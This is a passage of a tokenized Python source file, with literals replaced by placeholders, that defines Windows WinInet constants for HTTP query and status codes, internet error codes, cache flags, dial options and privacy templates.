<NUM_LIT> ) <EOL> GOPHER_ATTRIBUTE_ID_VIEW = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT> ) <EOL> GOPHER_ATTRIBUTE_ID_TREEWALK = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT> ) <EOL> GOPHER_ATTRIBUTE_ID_UNKNOWN = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT> ) <EOL> HTTP_MAJOR_VERSION = <NUM_LIT:1> <EOL> HTTP_MINOR_VERSION = <NUM_LIT:0> <EOL> HTTP_VERSIONA = "<STR_LIT>" <EOL> HTTP_VERSION = HTTP_VERSIONA <EOL> HTTP_QUERY_MIME_VERSION = <NUM_LIT:0> <EOL> HTTP_QUERY_CONTENT_TYPE = <NUM_LIT:1> <EOL> HTTP_QUERY_CONTENT_TRANSFER_ENCODING = <NUM_LIT:2> <EOL> HTTP_QUERY_CONTENT_ID = <NUM_LIT:3> <EOL> HTTP_QUERY_CONTENT_DESCRIPTION = <NUM_LIT:4> <EOL> HTTP_QUERY_CONTENT_LENGTH = <NUM_LIT:5> <EOL> HTTP_QUERY_CONTENT_LANGUAGE = <NUM_LIT:6> <EOL> HTTP_QUERY_ALLOW = <NUM_LIT:7> <EOL> HTTP_QUERY_PUBLIC = <NUM_LIT:8> <EOL> HTTP_QUERY_DATE = <NUM_LIT:9> <EOL> HTTP_QUERY_EXPIRES = <NUM_LIT:10> <EOL> HTTP_QUERY_LAST_MODIFIED = <NUM_LIT:11> <EOL> HTTP_QUERY_MESSAGE_ID = <NUM_LIT:12> <EOL> HTTP_QUERY_URI = <NUM_LIT> <EOL> HTTP_QUERY_DERIVED_FROM = <NUM_LIT> <EOL> HTTP_QUERY_COST = <NUM_LIT:15> <EOL> HTTP_QUERY_LINK = <NUM_LIT:16> <EOL> HTTP_QUERY_PRAGMA = <NUM_LIT> <EOL> HTTP_QUERY_VERSION = <NUM_LIT> <EOL> HTTP_QUERY_STATUS_CODE = <NUM_LIT> <EOL> HTTP_QUERY_STATUS_TEXT = <NUM_LIT:20> <EOL> HTTP_QUERY_RAW_HEADERS = <NUM_LIT> <EOL> HTTP_QUERY_RAW_HEADERS_CRLF = <NUM_LIT> <EOL> HTTP_QUERY_CONNECTION = <NUM_LIT> <EOL> HTTP_QUERY_ACCEPT = <NUM_LIT> <EOL> HTTP_QUERY_ACCEPT_CHARSET = <NUM_LIT> <EOL> HTTP_QUERY_ACCEPT_ENCODING = <NUM_LIT> <EOL> HTTP_QUERY_ACCEPT_LANGUAGE = <NUM_LIT> <EOL> HTTP_QUERY_AUTHORIZATION = <NUM_LIT> <EOL> HTTP_QUERY_CONTENT_ENCODING = <NUM_LIT> <EOL> HTTP_QUERY_FORWARDED = <NUM_LIT:30> <EOL> HTTP_QUERY_FROM = <NUM_LIT> <EOL> HTTP_QUERY_IF_MODIFIED_SINCE = <NUM_LIT:32> <EOL> HTTP_QUERY_LOCATION = <NUM_LIT> <EOL> HTTP_QUERY_ORIG_URI = <NUM_LIT> <EOL> HTTP_QUERY_REFERER = <NUM_LIT> <EOL> HTTP_QUERY_RETRY_AFTER = <NUM_LIT> <EOL> HTTP_QUERY_SERVER = <NUM_LIT> <EOL> HTTP_QUERY_TITLE = <NUM_LIT> <EOL> HTTP_QUERY_USER_AGENT = <NUM_LIT> <EOL> HTTP_QUERY_WWW_AUTHENTICATE = <NUM_LIT> <EOL> HTTP_QUERY_PROXY_AUTHENTICATE = <NUM_LIT> <EOL> HTTP_QUERY_ACCEPT_RANGES = <NUM_LIT> <EOL> HTTP_QUERY_SET_COOKIE = <NUM_LIT> <EOL> HTTP_QUERY_COOKIE = <NUM_LIT> <EOL> HTTP_QUERY_REQUEST_METHOD = <NUM_LIT> <EOL> HTTP_QUERY_REFRESH = <NUM_LIT> <EOL> HTTP_QUERY_CONTENT_DISPOSITION = <NUM_LIT> <EOL> HTTP_QUERY_AGE = <NUM_LIT> <EOL> HTTP_QUERY_CACHE_CONTROL = <NUM_LIT> <EOL> HTTP_QUERY_CONTENT_BASE = <NUM_LIT:50> <EOL> HTTP_QUERY_CONTENT_LOCATION = <NUM_LIT> <EOL> HTTP_QUERY_CONTENT_MD5 = <NUM_LIT> <EOL> HTTP_QUERY_CONTENT_RANGE = <NUM_LIT> <EOL> HTTP_QUERY_ETAG = <NUM_LIT> <EOL> HTTP_QUERY_HOST = <NUM_LIT> <EOL> HTTP_QUERY_IF_MATCH = <NUM_LIT> <EOL> HTTP_QUERY_IF_NONE_MATCH = <NUM_LIT> <EOL> HTTP_QUERY_IF_RANGE = <NUM_LIT> <EOL> HTTP_QUERY_IF_UNMODIFIED_SINCE = <NUM_LIT> <EOL> HTTP_QUERY_MAX_FORWARDS = <NUM_LIT> <EOL> HTTP_QUERY_PROXY_AUTHORIZATION = <NUM_LIT> <EOL> HTTP_QUERY_RANGE = <NUM_LIT> <EOL> HTTP_QUERY_TRANSFER_ENCODING = <NUM_LIT> <EOL> HTTP_QUERY_UPGRADE = <NUM_LIT:64> <EOL> HTTP_QUERY_VARY = <NUM_LIT> <EOL> HTTP_QUERY_VIA = <NUM_LIT> <EOL> HTTP_QUERY_WARNING = <NUM_LIT> <EOL> HTTP_QUERY_EXPECT = <NUM_LIT> <EOL> HTTP_QUERY_PROXY_CONNECTION = <NUM_LIT> <EOL> HTTP_QUERY_UNLESS_MODIFIED_SINCE = <NUM_LIT> <EOL> HTTP_QUERY_ECHO_REQUEST = <NUM_LIT> <EOL> HTTP_QUERY_ECHO_REPLY = <NUM_LIT> <EOL> HTTP_QUERY_ECHO_HEADERS = <NUM_LIT> <EOL> HTTP_QUERY_ECHO_HEADERS_CRLF = <NUM_LIT> <EOL> HTTP_QUERY_PROXY_SUPPORT = <NUM_LIT> <EOL> HTTP_QUERY_AUTHENTICATION_INFO = <NUM_LIT> <EOL> HTTP_QUERY_PASSPORT_URLS = <NUM_LIT> <EOL> HTTP_QUERY_PASSPORT_CONFIG = <NUM_LIT> <EOL> HTTP_QUERY_MAX = <NUM_LIT> <EOL> HTTP_QUERY_CUSTOM = <NUM_LIT> <EOL> HTTP_QUERY_FLAG_REQUEST_HEADERS = ( - <NUM_LIT> ) <EOL> HTTP_QUERY_FLAG_SYSTEMTIME = <NUM_LIT> <EOL> HTTP_QUERY_FLAG_NUMBER = <NUM_LIT> <EOL> HTTP_QUERY_FLAG_COALESCE = <NUM_LIT> <EOL> HTTP_QUERY_MODIFIER_FLAGS_MASK = ( HTTP_QUERY_FLAG_REQUEST_HEADERS | HTTP_QUERY_FLAG_SYSTEMTIME | HTTP_QUERY_FLAG_NUMBER | HTTP_QUERY_FLAG_COALESCE ) <EOL> HTTP_QUERY_HEADER_MASK = ( ~ HTTP_QUERY_MODIFIER_FLAGS_MASK ) <EOL> HTTP_STATUS_CONTINUE = <NUM_LIT:100> <EOL> HTTP_STATUS_SWITCH_PROTOCOLS = <NUM_LIT> <EOL> HTTP_STATUS_OK = <NUM_LIT:200> <EOL> HTTP_STATUS_CREATED = <NUM_LIT> <EOL> HTTP_STATUS_ACCEPTED = <NUM_LIT> <EOL> HTTP_STATUS_PARTIAL = <NUM_LIT> <EOL> HTTP_STATUS_NO_CONTENT = <NUM_LIT> <EOL> HTTP_STATUS_RESET_CONTENT = <NUM_LIT> <EOL> HTTP_STATUS_PARTIAL_CONTENT = <NUM_LIT> <EOL> HTTP_STATUS_AMBIGUOUS = <NUM_LIT> <EOL> HTTP_STATUS_MOVED = <NUM_LIT> <EOL> HTTP_STATUS_REDIRECT = <NUM_LIT> <EOL> HTTP_STATUS_REDIRECT_METHOD = <NUM_LIT> <EOL> HTTP_STATUS_NOT_MODIFIED = <NUM_LIT> <EOL> HTTP_STATUS_USE_PROXY = <NUM_LIT> <EOL> HTTP_STATUS_REDIRECT_KEEP_VERB = <NUM_LIT> <EOL> HTTP_STATUS_BAD_REQUEST = <NUM_LIT> <EOL> HTTP_STATUS_DENIED = <NUM_LIT> <EOL> HTTP_STATUS_PAYMENT_REQ = <NUM_LIT> <EOL> HTTP_STATUS_FORBIDDEN = <NUM_LIT> <EOL> HTTP_STATUS_NOT_FOUND = <NUM_LIT> <EOL> HTTP_STATUS_BAD_METHOD = <NUM_LIT> <EOL> HTTP_STATUS_NONE_ACCEPTABLE = <NUM_LIT> <EOL> HTTP_STATUS_PROXY_AUTH_REQ = <NUM_LIT> <EOL> HTTP_STATUS_REQUEST_TIMEOUT = <NUM_LIT> <EOL> HTTP_STATUS_CONFLICT = <NUM_LIT> <EOL> HTTP_STATUS_GONE = <NUM_LIT> <EOL> HTTP_STATUS_LENGTH_REQUIRED = <NUM_LIT> <EOL> HTTP_STATUS_PRECOND_FAILED = <NUM_LIT> <EOL> HTTP_STATUS_REQUEST_TOO_LARGE = <NUM_LIT> <EOL> HTTP_STATUS_URI_TOO_LONG = <NUM_LIT> <EOL> HTTP_STATUS_UNSUPPORTED_MEDIA = <NUM_LIT> <EOL> HTTP_STATUS_RETRY_WITH = <NUM_LIT> <EOL> HTTP_STATUS_SERVER_ERROR = <NUM_LIT> <EOL> HTTP_STATUS_NOT_SUPPORTED = <NUM_LIT> <EOL> HTTP_STATUS_BAD_GATEWAY = <NUM_LIT> <EOL> HTTP_STATUS_SERVICE_UNAVAIL = <NUM_LIT> <EOL> HTTP_STATUS_GATEWAY_TIMEOUT = <NUM_LIT> <EOL> HTTP_STATUS_VERSION_NOT_SUP = <NUM_LIT> <EOL> HTTP_STATUS_FIRST = HTTP_STATUS_CONTINUE <EOL> HTTP_STATUS_LAST = HTTP_STATUS_VERSION_NOT_SUP <EOL> HTTP_ADDREQ_INDEX_MASK = <NUM_LIT> <EOL> HTTP_ADDREQ_FLAGS_MASK = ( - <NUM_LIT> ) <EOL> HTTP_ADDREQ_FLAG_ADD_IF_NEW = <NUM_LIT> <EOL> HTTP_ADDREQ_FLAG_ADD = <NUM_LIT> <EOL> HTTP_ADDREQ_FLAG_COALESCE_WITH_COMMA = <NUM_LIT> <EOL> HTTP_ADDREQ_FLAG_COALESCE_WITH_SEMICOLON = <NUM_LIT> <EOL> HTTP_ADDREQ_FLAG_COALESCE = HTTP_ADDREQ_FLAG_COALESCE_WITH_COMMA <EOL> HTTP_ADDREQ_FLAG_REPLACE = ( - <NUM_LIT> ) <EOL> HSR_ASYNC = WININET_API_FLAG_ASYNC <EOL> HSR_SYNC = WININET_API_FLAG_SYNC <EOL> HSR_USE_CONTEXT = WININET_API_FLAG_USE_CONTEXT <EOL> HSR_INITIATE = <NUM_LIT> <EOL> HSR_DOWNLOAD = <NUM_LIT> <EOL> HSR_CHUNKED = <NUM_LIT> <EOL> INTERNET_COOKIE_IS_SECURE = <NUM_LIT> <EOL> INTERNET_COOKIE_IS_SESSION = <NUM_LIT> <EOL> INTERNET_COOKIE_THIRD_PARTY = <NUM_LIT> <EOL> INTERNET_COOKIE_PROMPT_REQUIRED = <NUM_LIT> <EOL> INTERNET_COOKIE_EVALUATE_P3P = <NUM_LIT> <EOL> INTERNET_COOKIE_APPLY_P3P = <NUM_LIT> <EOL> INTERNET_COOKIE_P3P_ENABLED = <NUM_LIT> <EOL> INTERNET_COOKIE_IS_RESTRICTED = <NUM_LIT> <EOL> INTERNET_COOKIE_IE6 = <NUM_LIT> <EOL> INTERNET_COOKIE_IS_LEGACY = <NUM_LIT> <EOL> FLAG_ICC_FORCE_CONNECTION = <NUM_LIT> <EOL> FLAGS_ERROR_UI_FILTER_FOR_ERRORS = <NUM_LIT> <EOL> FLAGS_ERROR_UI_FLAGS_CHANGE_OPTIONS = <NUM_LIT> <EOL> FLAGS_ERROR_UI_FLAGS_GENERATE_DATA = <NUM_LIT> <EOL> FLAGS_ERROR_UI_FLAGS_NO_UI = <NUM_LIT> <EOL> FLAGS_ERROR_UI_SERIALIZE_DIALOGS = <NUM_LIT> <EOL> INTERNET_ERROR_BASE = <NUM_LIT> <EOL> ERROR_INTERNET_OUT_OF_HANDLES = ( INTERNET_ERROR_BASE + <NUM_LIT:1> ) <EOL> ERROR_INTERNET_TIMEOUT = ( INTERNET_ERROR_BASE + <NUM_LIT:2> ) <EOL> ERROR_INTERNET_EXTENDED_ERROR = ( INTERNET_ERROR_BASE + <NUM_LIT:3> ) <EOL> ERROR_INTERNET_INTERNAL_ERROR = ( INTERNET_ERROR_BASE + <NUM_LIT:4> ) <EOL> ERROR_INTERNET_INVALID_URL = ( INTERNET_ERROR_BASE + <NUM_LIT:5> ) <EOL> ERROR_INTERNET_UNRECOGNIZED_SCHEME = ( INTERNET_ERROR_BASE + <NUM_LIT:6> ) <EOL> ERROR_INTERNET_NAME_NOT_RESOLVED = ( INTERNET_ERROR_BASE + <NUM_LIT:7> ) <EOL> ERROR_INTERNET_PROTOCOL_NOT_FOUND = ( INTERNET_ERROR_BASE + <NUM_LIT:8> ) <EOL> ERROR_INTERNET_INVALID_OPTION = ( INTERNET_ERROR_BASE + <NUM_LIT:9> ) <EOL> ERROR_INTERNET_BAD_OPTION_LENGTH = ( INTERNET_ERROR_BASE + <NUM_LIT:10> ) <EOL> ERROR_INTERNET_OPTION_NOT_SETTABLE = ( INTERNET_ERROR_BASE + <NUM_LIT:11> ) <EOL> ERROR_INTERNET_SHUTDOWN = ( INTERNET_ERROR_BASE + <NUM_LIT:12> ) <EOL> ERROR_INTERNET_INCORRECT_USER_NAME = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_INCORRECT_PASSWORD = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_LOGIN_FAILURE = ( INTERNET_ERROR_BASE + <NUM_LIT:15> ) <EOL> ERROR_INTERNET_INVALID_OPERATION = ( INTERNET_ERROR_BASE + <NUM_LIT:16> ) <EOL> ERROR_INTERNET_OPERATION_CANCELLED = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_INCORRECT_HANDLE_TYPE = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_INCORRECT_HANDLE_STATE = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_NOT_PROXY_REQUEST = ( INTERNET_ERROR_BASE + <NUM_LIT:20> ) <EOL> ERROR_INTERNET_REGISTRY_VALUE_NOT_FOUND = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_BAD_REGISTRY_PARAMETER = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_NO_DIRECT_ACCESS = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_NO_CONTEXT = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_NO_CALLBACK = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_REQUEST_PENDING = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_INCORRECT_FORMAT = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_ITEM_NOT_FOUND = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_CANNOT_CONNECT = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_CONNECTION_ABORTED = ( INTERNET_ERROR_BASE + <NUM_LIT:30> ) <EOL> ERROR_INTERNET_CONNECTION_RESET = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_FORCE_RETRY = ( INTERNET_ERROR_BASE + <NUM_LIT:32> ) <EOL> ERROR_INTERNET_INVALID_PROXY_REQUEST = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_NEED_UI = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_HANDLE_EXISTS = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_SEC_CERT_DATE_INVALID = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_SEC_CERT_CN_INVALID = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_HTTP_TO_HTTPS_ON_REDIR = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_HTTPS_TO_HTTP_ON_REDIR = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_MIXED_SECURITY = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_CHG_POST_IS_NON_SECURE = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_POST_IS_NON_SECURE = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_CLIENT_AUTH_CERT_NEEDED = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_INVALID_CA = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_CLIENT_AUTH_NOT_SETUP = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_ASYNC_THREAD_FAILED = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_REDIRECT_SCHEME_CHANGE = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_DIALOG_PENDING = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_RETRY_DIALOG = ( INTERNET_ERROR_BASE + <NUM_LIT:50> ) <EOL> ERROR_INTERNET_HTTPS_HTTP_SUBMIT_REDIR = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_INSERT_CDROM = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_FORTEZZA_LOGIN_NEEDED = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_SEC_CERT_ERRORS = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_SEC_CERT_NO_REV = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_SEC_CERT_REV_FAILED = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_FTP_TRANSFER_IN_PROGRESS = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_FTP_DROPPED = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_FTP_NO_PASSIVE_MODE = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_GOPHER_PROTOCOL_ERROR = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_GOPHER_NOT_FILE = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_GOPHER_DATA_ERROR = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_GOPHER_END_OF_DATA = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_GOPHER_INVALID_LOCATOR = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_GOPHER_INCORRECT_LOCATOR_TYPE = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_GOPHER_NOT_GOPHER_PLUS = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_GOPHER_ATTRIBUTE_NOT_FOUND = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_GOPHER_UNKNOWN_LOCATOR = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_HTTP_HEADER_NOT_FOUND = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_HTTP_DOWNLEVEL_SERVER = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_HTTP_INVALID_SERVER_RESPONSE = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_HTTP_INVALID_HEADER = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_HTTP_INVALID_QUERY_REQUEST = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_HTTP_HEADER_ALREADY_EXISTS = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_HTTP_REDIRECT_FAILED = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_HTTP_NOT_REDIRECTED = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_HTTP_COOKIE_NEEDS_CONFIRMATION = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_HTTP_COOKIE_DECLINED = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_HTTP_REDIRECT_NEEDS_CONFIRMATION = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_SECURITY_CHANNEL_ERROR = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_UNABLE_TO_CACHE_FILE = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_TCPIP_NOT_INSTALLED = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_DISCONNECTED = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_SERVER_UNREACHABLE = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_PROXY_SERVER_UNREACHABLE = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_BAD_AUTO_PROXY_SCRIPT = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_UNABLE_TO_DOWNLOAD_SCRIPT = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_SEC_INVALID_CERT = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_SEC_CERT_REVOKED = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_FAILED_DUETOSECURITYCHECK = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_NOT_INITIALIZED = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_NEED_MSN_SSPI_PKG = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_LOGIN_FAILURE_DISPLAY_ENTITY_BODY = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> INTERNET_ERROR_LAST = ERROR_INTERNET_LOGIN_FAILURE_DISPLAY_ENTITY_BODY <EOL> NORMAL_CACHE_ENTRY = <NUM_LIT> <EOL> STICKY_CACHE_ENTRY = <NUM_LIT> <EOL> EDITED_CACHE_ENTRY = <NUM_LIT> <EOL> TRACK_OFFLINE_CACHE_ENTRY = <NUM_LIT> <EOL> TRACK_ONLINE_CACHE_ENTRY = <NUM_LIT> <EOL> SPARSE_CACHE_ENTRY = <NUM_LIT> <EOL> COOKIE_CACHE_ENTRY = <NUM_LIT> <EOL> URLHISTORY_CACHE_ENTRY = <NUM_LIT> <EOL> URLCACHE_FIND_DEFAULT_FILTER = NORMAL_CACHE_ENTRY | COOKIE_CACHE_ENTRY | URLHISTORY_CACHE_ENTRY | TRACK_OFFLINE_CACHE_ENTRY | TRACK_ONLINE_CACHE_ENTRY | STICKY_CACHE_ENTRY <EOL> CACHEGROUP_ATTRIBUTE_GET_ALL = ( - <NUM_LIT:1> ) <EOL> CACHEGROUP_ATTRIBUTE_BASIC = <NUM_LIT> <EOL> CACHEGROUP_ATTRIBUTE_FLAG = <NUM_LIT> <EOL> CACHEGROUP_ATTRIBUTE_TYPE = <NUM_LIT> <EOL> CACHEGROUP_ATTRIBUTE_QUOTA = <NUM_LIT> <EOL> CACHEGROUP_ATTRIBUTE_GROUPNAME = <NUM_LIT> <EOL> CACHEGROUP_ATTRIBUTE_STORAGE = <NUM_LIT> <EOL> CACHEGROUP_FLAG_NONPURGEABLE = <NUM_LIT> <EOL> CACHEGROUP_FLAG_GIDONLY = <NUM_LIT> <EOL> CACHEGROUP_FLAG_FLUSHURL_ONDELETE = <NUM_LIT> <EOL> CACHEGROUP_SEARCH_ALL = <NUM_LIT> <EOL> CACHEGROUP_SEARCH_BYURL = <NUM_LIT> <EOL> CACHEGROUP_TYPE_INVALID = <NUM_LIT> <EOL> CACHEGROUP_READWRITE_MASK = CACHEGROUP_ATTRIBUTE_TYPE | CACHEGROUP_ATTRIBUTE_QUOTA | CACHEGROUP_ATTRIBUTE_GROUPNAME | CACHEGROUP_ATTRIBUTE_STORAGE <EOL> GROUPNAME_MAX_LENGTH = <NUM_LIT> <EOL> GROUP_OWNER_STORAGE_SIZE = <NUM_LIT:4> <EOL> CACHE_ENTRY_ATTRIBUTE_FC = <NUM_LIT> <EOL> CACHE_ENTRY_HITRATE_FC = <NUM_LIT> <EOL> CACHE_ENTRY_MODTIME_FC = <NUM_LIT> <EOL> CACHE_ENTRY_EXPTIME_FC = <NUM_LIT> <EOL> CACHE_ENTRY_ACCTIME_FC = <NUM_LIT> <EOL> CACHE_ENTRY_SYNCTIME_FC = <NUM_LIT> <EOL> CACHE_ENTRY_HEADERINFO_FC = <NUM_LIT> <EOL> CACHE_ENTRY_EXEMPT_DELTA_FC = <NUM_LIT> <EOL> INTERNET_CACHE_GROUP_ADD = <NUM_LIT:0> <EOL> INTERNET_CACHE_GROUP_REMOVE = <NUM_LIT:1> <EOL> INTERNET_DIAL_FORCE_PROMPT = <NUM_LIT> <EOL> INTERNET_DIAL_SHOW_OFFLINE = <NUM_LIT> <EOL> INTERNET_DIAL_UNATTENDED = <NUM_LIT> <EOL> INTERENT_GOONLINE_REFRESH = <NUM_LIT> <EOL> INTERENT_GOONLINE_MASK = <NUM_LIT> <EOL> INTERNET_AUTODIAL_FORCE_ONLINE = <NUM_LIT:1> <EOL> INTERNET_AUTODIAL_FORCE_UNATTENDED = <NUM_LIT:2> <EOL> INTERNET_AUTODIAL_FAILIFSECURITYCHECK = <NUM_LIT:4> <EOL> INTERNET_AUTODIAL_OVERRIDE_NET_PRESENT = <NUM_LIT:8> <EOL> INTERNET_AUTODIAL_FLAGS_MASK = ( INTERNET_AUTODIAL_FORCE_ONLINE | INTERNET_AUTODIAL_FORCE_UNATTENDED | INTERNET_AUTODIAL_FAILIFSECURITYCHECK | INTERNET_AUTODIAL_OVERRIDE_NET_PRESENT ) <EOL> PROXY_AUTO_DETECT_TYPE_DHCP = <NUM_LIT:1> <EOL> PROXY_AUTO_DETECT_TYPE_DNS_A = <NUM_LIT:2> <EOL> INTERNET_CONNECTION_MODEM = <NUM_LIT> <EOL> INTERNET_CONNECTION_LAN = <NUM_LIT> <EOL> INTERNET_CONNECTION_PROXY = <NUM_LIT> <EOL> INTERNET_CONNECTION_MODEM_BUSY = <NUM_LIT> <EOL> INTERNET_RAS_INSTALLED = <NUM_LIT> <EOL> INTERNET_CONNECTION_OFFLINE = <NUM_LIT> <EOL> INTERNET_CONNECTION_CONFIGURED = <NUM_LIT> <EOL> INTERNET_CUSTOMDIAL_CONNECT = <NUM_LIT:0> <EOL> INTERNET_CUSTOMDIAL_UNATTENDED = <NUM_LIT:1> <EOL> INTERNET_CUSTOMDIAL_DISCONNECT = <NUM_LIT:2> <EOL> INTERNET_CUSTOMDIAL_SHOWOFFLINE = <NUM_LIT:4> <EOL> INTERNET_CUSTOMDIAL_SAFE_FOR_UNATTENDED = <NUM_LIT:1> <EOL> INTERNET_CUSTOMDIAL_WILL_SUPPLY_STATE = <NUM_LIT:2> <EOL> INTERNET_CUSTOMDIAL_CAN_HANGUP = <NUM_LIT:4> <EOL> INTERNET_DIALSTATE_DISCONNECTED = <NUM_LIT:1> <EOL> INTERNET_IDENTITY_FLAG_PRIVATE_CACHE = <NUM_LIT> <EOL> INTERNET_IDENTITY_FLAG_SHARED_CACHE = <NUM_LIT> <EOL> INTERNET_IDENTITY_FLAG_CLEAR_DATA = <NUM_LIT> <EOL> INTERNET_IDENTITY_FLAG_CLEAR_COOKIES = <NUM_LIT> <EOL> INTERNET_IDENTITY_FLAG_CLEAR_HISTORY = <NUM_LIT> <EOL> INTERNET_IDENTITY_FLAG_CLEAR_CONTENT = <NUM_LIT> <EOL> INTERNET_SUPPRESS_RESET_ALL = <NUM_LIT> <EOL> INTERNET_SUPPRESS_COOKIE_POLICY = <NUM_LIT> <EOL> INTERNET_SUPPRESS_COOKIE_POLICY_RESET = <NUM_LIT> <EOL> PRIVACY_TEMPLATE_NO_COOKIES = <NUM_LIT:0> <EOL> PRIVACY_TEMPLATE_HIGH = <NUM_LIT:1> <EOL> PRIVACY_TEMPLATE_MEDIUM_HIGH = <NUM_LIT:2> <EOL> PRIVACY_TEMPLATE_MEDIUM = <NUM_LIT:3> <EOL> PRIVACY_TEMPLATE_MEDIUM_LOW = <NUM_LIT:4> <EOL> PRIVACY_TEMPLATE_LOW = <NUM_LIT:5> <EOL> PRIVACY_TEMPLATE_CUSTOM = <NUM_LIT:100> <EOL> PRIVACY_TEMPLATE_ADVANCED = <NUM_LIT> <EOL> PRIVACY_TEMPLATE_MAX = PRIVACY_TEMPLATE_LOW <EOL> PRIVACY_TYPE_FIRST_PARTY = <NUM_LIT:0> <EOL> PRIVACY_TYPE_THIRD_PARTY = <NUM_LIT:1> </s>
